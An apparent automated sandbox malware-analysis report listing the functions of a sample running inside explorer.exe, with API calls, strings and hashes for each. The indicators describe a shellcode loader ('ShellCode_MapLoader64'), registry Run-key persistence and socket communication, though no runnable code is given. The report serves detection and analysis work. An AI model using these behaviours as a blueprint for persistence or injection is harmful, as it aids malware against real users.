                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit$CommandInfoInitializeLineStartup__setargv_cinit_wincmdln
                          • String ID:
                          • API String ID: 4082634633-0
                          • Opcode ID: b44917637bbf1f89a7f45a35ef9faf2f22883a734568f6132f706dea1eeab0f1
                          • Instruction ID: 4c097eab109bc50fe30132c052377d90b74748e1b7a1e326f72455aecd102466
                          • Opcode Fuzzy Hash: b44917637bbf1f89a7f45a35ef9faf2f22883a734568f6132f706dea1eeab0f1
                          • Instruction Fuzzy Hash: E031AF7060174786EBAD77B5A8D03F922A5AF9134CF044039DB5683292FF7CC446C752
                          Function 011A2310 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 144threadsleepkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventExitThreadUser$AsyncCloseHandleObjectOpenSingleSleepStateWaitlstrlen
                          • String ID: 2${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 4137407306-994883157
                          • Opcode ID: 994a8e8ff916f57d867b8865c044ee6ee85714d811b882fb27882ff3b1c0216c
                          • Instruction ID: 3a87a6edddbcbea6d76d134fd338ae0d74a888d1ce2028879ae8fa10459f03b9
                          • Opcode Fuzzy Hash: 994a8e8ff916f57d867b8865c044ee6ee85714d811b882fb27882ff3b1c0216c
                          • Instruction Fuzzy Hash: 17819376209BC485D779DB10F4943DAB7A8F788354F90422ACB8D42B68EF3CC199CB44
                          Function 011BB400 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CreateFrameInfo_amsg_exit
                          • String ID: csm
                          • API String ID: 2825728721-1018135373
                          • Opcode ID: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                          • Instruction ID: 1ae8f5c6b31d13ba5c8ba4ec2abf09cecb116e6338b3ef2795fa07ae30752f85
                          • Opcode Fuzzy Hash: 0cd7f8e15f380f6a6fea30ba78b5612564a28041d2ae9aefdf9c6c58aa47cef5
                          • Instruction Fuzzy Hash: BD417E36204B82D2CA39AF16F4803AE77A5FB89BA9F444225DF9D07B54DF38C0A5C701
                          Function 011A01E0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetKnownFolderPath.SHELL32 ref: 011A01F8
                          • LocalAlloc.KERNEL32 ref: 011A0210
                          • LocalFree.KERNEL32 ref: 011A030B
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • lstrlenW.KERNEL32 ref: 011A0262
                          • GetFileAttributesW.KERNEL32 ref: 011A02CA
                          • SHFileOperationW.SHELL32 ref: 011A02E3
                          • CoTaskMemFree.COMBASE ref: 011A0316
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask_errno_invalid_parameter_noinfolstrlen
                          • String ID: %s\%s${1696C082-D722-4591-A9C7-217696659A97}
                          • API String ID: 2444233868-2324704760
                          • Opcode ID: 114d894e8b8712ade2050ea490133d1fbe5f606a5f121444ac17ba17da42a113
                          • Instruction ID: 58781f1bdee60c4d28a038988eb67b3567e01d9149b80216e0d5e198837e0714
                          • Opcode Fuzzy Hash: 114d894e8b8712ade2050ea490133d1fbe5f606a5f121444ac17ba17da42a113
                          • Instruction Fuzzy Hash: 4E312075218A4486E758DF19E8843AA7BB1FBC9794F501026F78F83A68DF3DC486CB00
                          Function 011AC260 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63windowregistryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                          • String ID: {2C62FD04-7315-45E1-81CC-8E836772E64E}
                          • API String ID: 1237952354-2543154685
                          • Opcode ID: 1d5d3e7f1e2eac2bd7ea67f9950bb0886d2ddd34607480052f5632d741a32fd0
                          • Instruction ID: b2fe93ae5cbcc52a02038c56ca66c6dff6bfca823f80c473319234cadc5e1402
                          • Opcode Fuzzy Hash: 1d5d3e7f1e2eac2bd7ea67f9950bb0886d2ddd34607480052f5632d741a32fd0
                          • Instruction Fuzzy Hash: 99312775248B81C2F7289B24F8947DA77A1FB94744F90502AD78E43A78DF3CC14ACB80
                          Function 011B4DC0 Relevance: 16.7, APIs: 11, Instructions: 228timeCOMMON
                          Download Yara Rule
                          APIs
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B34E0: send.WS2_32 ref: 011B350C
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuesend
                          • String ID:
                          • API String ID: 1596855159-0
                          • Opcode ID: 36c340b5594caf7fedd5d2e1c5654e297a7404e4b9dd5892987c8b85f93f5022
                          • Instruction ID: 338b6e2b0141d8c1dc6deceaa5041cbc11f493e3f67450da4a53349389812f94
                          • Opcode Fuzzy Hash: 36c340b5594caf7fedd5d2e1c5654e297a7404e4b9dd5892987c8b85f93f5022
                          • Instruction Fuzzy Hash: 71C1D6366097C0CAD7B9CB19E4847EAB7A1F788744F01811AE78A83B59DB79C485CF02
                          Function 011A4230 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 233synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 011A42CE
                          • SetEvent.KERNEL32 ref: 011A4479
                          • WaitForSingleObject.KERNEL32 ref: 011A44E1
                          • CloseHandle.KERNEL32 ref: 011A4544
                          • CloseHandle.KERNEL32 ref: 011A45D8
                          • VirtualFree.KERNEL32 ref: 011A4683
                          • shutdown.WS2_32 ref: 011A475D
                          • closesocket.WS2_32 ref: 011A4768
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeCloseConcurrency::details::platform::__HandleQueue$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                          • String ID: d
                          • API String ID: 1089388041-2564639436
                          • Opcode ID: eb3c52e496b65605d03f19e217382a664853bb10ffbae4b472a6557e73bb4790
                          • Instruction ID: ae96faa096626700d30aa9f0d1ccf63600bc08223041c76c8f40bdec90264e1d
                          • Opcode Fuzzy Hash: eb3c52e496b65605d03f19e217382a664853bb10ffbae4b472a6557e73bb4790
                          • Instruction Fuzzy Hash: 6CC13D36208F8085EB78DB04F4943EAA7A0F7D5754F914626D68E87BA8EF7CC195CB40
                          Function 011B3290 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 144976343-2564639436
                          • Opcode ID: f5f5c75b8162aad1a5c465ca517c8a5032cabfa6638f8675b1b353c44dc430bd
                          • Instruction ID: 3d52f4005f01c57a8028791696e28bdd27051d3e061b9669a308ed9e45073c59
                          • Opcode Fuzzy Hash: f5f5c75b8162aad1a5c465ca517c8a5032cabfa6638f8675b1b353c44dc430bd
                          • Instruction Fuzzy Hash: 86419536218B8482DB18DB19F49439AB7B0F3C5B94F11512AEB9E47B68CF7DC495CB40
                          Function 011A38E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 69memoryprocessCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011A38F6
                          • GetSystemDirectoryW.KERNEL32 ref: 011A3917
                          • LocalAlloc.KERNEL32 ref: 011A392F
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • CreateProcessW.KERNEL32 ref: 011A3A0E
                          • LocalFree.KERNEL32 ref: 011A3A1E
                          • LocalFree.KERNEL32 ref: 011A3A29
                          • LocalFree.KERNEL32 ref: 011A3A3B
                          • LocalFree.KERNEL32 ref: 011A3A46
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem_errno_invalid_parameter_noinfolstrlen
                          • String ID: h
                          • API String ID: 1407737935-2439710439
                          • Opcode ID: 5cfd65f1d10050b0c964e5d9f941a3bb9fc1a00c6d635ad714ec9a61c2ba5579
                          • Instruction ID: 0ab5a07ba9b99b94d33dd68bf6d57f731a4d7b46acc588e1ca83983ab3792f9b
                          • Opcode Fuzzy Hash: 5cfd65f1d10050b0c964e5d9f941a3bb9fc1a00c6d635ad714ec9a61c2ba5579
                          • Instruction Fuzzy Hash: 27311876218B8582E7289F50F49439ABBA1F7C4798F504129EB8987B68DFBCC449CF00
                          Function 01197840 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 51registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 0119786E
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegOpenKeyW.ADVAPI32 ref: 011978B3
                          • lstrlenW.KERNEL32 ref: 011978C2
                          • RegSetValueExW.ADVAPI32 ref: 011978F5
                          • RegCloseKey.ADVAPI32 ref: 01197907
                          • RegCloseKey.ADVAPI32 ref: 0119791C
                          Strings
                          • {F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}, xrefs: 0119787C
                          • {B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}, xrefs: 011978E6
                          • SOFTWARE\%s, xrefs: 01197883
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$FileModuleNameOpenValue_errno_invalid_parameter_noinfolstrlen
                          • String ID: SOFTWARE\%s${B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 3731830441-3335224962
                          • Opcode ID: e4ce0b43109d6df259eb14dcb2e7d2f80396993e1aa89159513a0b9c8b62aa1e
                          • Instruction ID: e2dbee1c463089ec4859f0cf4f797bfa43509d49e2466e1b0f574d2f0fdb768e
                          • Opcode Fuzzy Hash: e4ce0b43109d6df259eb14dcb2e7d2f80396993e1aa89159513a0b9c8b62aa1e
                          • Instruction Fuzzy Hash: 61112431324A8491DB68DF25F8947DA73A1FB84B95F80112ADB5E836A8EF7CC145CB44
                          Function 011C1434 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32 ref: 011C14CE
                          • malloc.LIBCMT ref: 011C1537
                          • MultiByteToWideChar.KERNEL32 ref: 011C156B
                          • LCMapStringW.KERNEL32 ref: 011C1592
                          • LCMapStringW.KERNEL32 ref: 011C15DA
                          • malloc.LIBCMT ref: 011C1637
                            • Part of subcall function 011BC7A8: _FF_MSGBANNER.LIBCMT ref: 011BC7D8
                            • Part of subcall function 011BC7A8: HeapAlloc.KERNEL32(?,?,?,011C06FC,?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5), ref: 011BC7FD
                            • Part of subcall function 011BC7A8: _callnewh.LIBCMT ref: 011BC816
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC821
                            • Part of subcall function 011BC7A8: _errno.LIBCMT ref: 011BC82C
                          • LCMapStringW.KERNEL32 ref: 011C166C
                          • WideCharToMultiByte.KERNEL32 ref: 011C16AC
                          • free.LIBCMT ref: 011C16C0
                          • free.LIBCMT ref: 011C16D1
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                          • String ID:
                          • API String ID: 1080698880-0
                          • Opcode ID: 775727bf0992f1fd30e19aae136c0ffe87d5617b5013afb31929f2c8c6fdd627
                          • Instruction ID: 3f089e51c3b36a9a2f19d6ee81ecff365cdb634272bcb0fc812996359f442804
                          • Opcode Fuzzy Hash: 775727bf0992f1fd30e19aae136c0ffe87d5617b5013afb31929f2c8c6fdd627
                          • Instruction Fuzzy Hash: B871D632740B80D6DB2C9F29D880399BBA5F769FE8F584229EB5D43B95DB78C101C700
                          Function 011C105C Relevance: 15.1, APIs: 10, Instructions: 123COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _errno.LIBCMT ref: 011C10A3
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C10AF
                          • _errno.LIBCMT ref: 011C10F9
                          • _errno.LIBCMT ref: 011C1104
                          • _errno.LIBCMT ref: 011C1136
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C1140
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,011C122F), ref: 011C11B2
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,011C122F), ref: 011C11CF
                          • _errno.LIBCMT ref: 011C11F5
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C1201
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 2295021086-0
                          • Opcode ID: 1022d87718d735e22826c2420f752dd04f721ba2b59c7e068789ea1ebcbc5462
                          • Instruction ID: bd6f7f26f2b625dbe70996cf22134609fd052ab3af547b74340d3b94ce6990a3
                          • Opcode Fuzzy Hash: 1022d87718d735e22826c2420f752dd04f721ba2b59c7e068789ea1ebcbc5462
                          • Instruction Fuzzy Hash: 0441E8327417C1EAFB2D9F79C5803ED7A60FBA5FA8F144228DF5607A96CB3880528711
                          Function 01195AD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 01195AFE
                          • _LDint.LIBCPMTD ref: 01195B15
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • CreateFileW.KERNEL32 ref: 01195B93
                          • WriteFile.KERNEL32 ref: 01195BF0
                          • CloseHandle.KERNEL32 ref: 01195C13
                          • CloseHandle.KERNEL32 ref: 01195C28
                          • DeleteFileW.KERNEL32 ref: 01195C36
                          Strings
                          • %s\ShellCode_MapLoader64, xrefs: 01195B42
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateDeleteDintModuleNameWrite_errno_invalid_parameter_noinfo
                          • String ID: %s\ShellCode_MapLoader64
                          • API String ID: 797432855-674329531
                          • Opcode ID: 60f46556b92870cccfb019baeea503ecb8a560fc55a27509f804e55b63d6c3b6
                          • Instruction ID: 67178758424393e9a832f0071cdbb6ae48de1c1b6586a6367a6a644303ead6ea
                          • Opcode Fuzzy Hash: 60f46556b92870cccfb019baeea503ecb8a560fc55a27509f804e55b63d6c3b6
                          • Instruction Fuzzy Hash: 9B311572228AC486DB74DB24F8983DA6365F784764F800326C7A983AA8DF3DC509CB44
                          Function 0119F370 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 30registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F3C5
                          • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F382
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
